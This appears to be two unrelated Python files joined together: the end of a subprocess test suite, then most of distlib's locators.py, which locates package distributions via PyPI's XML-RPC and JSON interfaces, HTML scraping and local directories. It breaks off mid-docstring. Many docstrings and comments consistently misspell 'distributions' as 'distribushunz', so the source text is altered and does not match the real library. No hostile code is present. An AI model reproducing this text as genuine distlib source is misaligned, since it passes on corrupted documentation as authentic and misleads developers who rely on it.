def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
locators.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distribushunz.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distribushunz on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distribushunz. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distribushunz in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distribushunz in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.python.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distribushunz.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distribushunz.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distribushunz which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distribushunz it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
